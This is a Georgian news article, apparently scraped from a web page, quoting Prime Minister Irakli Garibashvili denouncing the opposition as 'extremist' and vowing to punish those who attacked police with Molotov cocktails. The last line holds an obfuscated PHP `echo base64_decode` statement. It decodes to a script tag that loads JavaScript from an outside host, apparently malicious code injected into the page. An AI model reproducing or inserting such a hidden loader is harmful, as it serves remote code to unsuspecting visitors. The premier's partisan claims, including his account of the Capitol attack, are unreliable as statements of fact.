celsiusi
ავერსი შნაიდერი

კიდევ ერთხელ მინდა ვთქვა, რომ ეს დეგრადირებული ოპოზიცია, რომელიც არის აბსოლუტურად ხელმოცარული, თუ ვინმე ეწინააღმდეგება დღეს იმ სიკეთეებს რაც ჩამოვთვალე, კეთილდღეობას, იმას, რომ მეტი შემოსავალი ნახოს ჩვენმა ხალხმა, ესაა სწორედ ეს დეგრადირებული ექსტრემისტული ოპოზიცია, - ამის შესახებ საქართველოს პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა მთავრობის დღევანდელ სხდომაზე განაცხადა.

პრემიერის განცხადებით, მათ არ უნდათ, რომ ქვეყანაში იყოს მაღალი ეკონომიკური ზრდა, მშვიდობა, სტაბილურობა.

 

"ყველაფერს აკეთებენ, რომ შეწირონ საკუთარი ქვეყანა, საკუთარი ქვეყნის და ხალხის უსაფრთხოება. ამიტომ მე მინდა ყველას ვუთხრა ძალიან მკაფიოდ, რომ დღეს ხელისუფლება არის მოწოდების სიმაღლეზე, მტკიცედ და ძლიერად დგას, ვინარჩუნებთ მშვიდობას, სტაბილურობას, მაღალ ეკონომიკურ ზრდას და ამ გზაზე ჩვენ ვერავინ შეგვეწინააღმდეგება, ეს მინდა ვუთხრა მათ. აქ გადის ჩვენი ეროვნული ინტერესები, ჩვენი ხალხის და ქვეყნის ინტერესები და ბუნებრივია ამ ბრძოლაში ვიქნებით უკომპრომისო. მიუღებელია ის, რაც მოხდა, კატეგორიულად მიუღებელია. უნდა დაისაჯოს ყველა, ვინც არის ბრალდებული და მხილებული პოლიციაზე თავდასხმის საქმეში", - განაცხადა პრემიერმა.

როგორც მთავრობის მეთაურმა აღნიშნა, კანონი აღსრულდება ყველას მიმართ.

„ერთი რამ მინდა შევახსენო ყველას, მაგალითად ამერიკის შეერთებულ შტატებში რაც მოხდა კაპიტოლიუმზე თავდასხმის დროს, 4 ადამიანი ადგილზე იქნა ლიკვიდირებული, ადგილზე მოკლეს 4 ადამიანი, რომელიც შეიჭრა კონგრესის შენობაში. ჩვენთან ეს თურმე ნორმაა, რომ ეს ანარქისტები შეგვეშვა პარლამენტის შენობაში, თურმე ნორმაა, რომ ცეცხლი გაუხსნან პოლიციას „მოლოტოვის კოქტეილებით“ და პოლიციამ არ უნდა იმოქმედოს, არ უნდა დავიჭიროთ არავინ, არავინ უნდა დავსაჯოთ და ამ ანარქისტებს და ქაოსის დამთესველებს, ქვეყნის მტრებს მივცეთ საშუალება, ქვეყანაში შემოიტანონ არეულობა.

ამას რა თქმა უნდა არ ვიზამთ. ამერიკაში, შეგახსენებთ, რომ რამდენიმე ასეული ადამიანი იქნა მხილებული, მრავალი ათეული წლით გაუშვეს ციხეში, ოთხი ადამიანი ადგილზე მოკლეს. ევროპის ქვეყნებში ხედავთ რაც ხდება, ევროპაში როცა საქმე ეხება უსაფრთხოებას, სტაბილურობას, მანდ უკომპრომისო ბრძოლა მიდის. ჩვენთან ასე სუფთად ჩაატარა პოლიციამ ღონისძიება, არავინ დაშავებულა რეალურად, მაქსიმალური სიფრთხილით მოვეკიდეთ და დღეს გვეუბნებიან დღეს, რომ თურმე „მოლოტოვის კოქტეილს“ რომ ისვრის ვიღაც ანარქისტი და ქვებს რომ უშენენ პოლიციას ამაზე უნდა დავხუჭოთ თვალი, ეს რა თქმა უნდა არ მოხდება და კანონი აღსრულდება ყველას მიმართ. ეს უნდა იყოს რა თქმა უნდა დაფუძნებული მტკიცებულებებზე და არავის უსამართლოდ არ დავსჯით, არ დაგვისჯია, არც არავინ დაისჯება. ეს მინდოდა მეთქვა. ჩვენ გვინდა ახლა დამშვიდება, საზოგადოებას სჭიდება მშვიდობა, სიწყნარე, მეტი სამუშაო ადგილები, მეტი კეთილდღეობა გვჭირდება და ის სიკეთეები, რაც ჩამოვთვალე, ესაა ჩვენი მთავარი ამოცანა, მეტი პროექტების მშენებლობა დაა მეტი განვითარება,“- აღნიშნა ირაკლი ღარიბაშვილმა. 

328
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");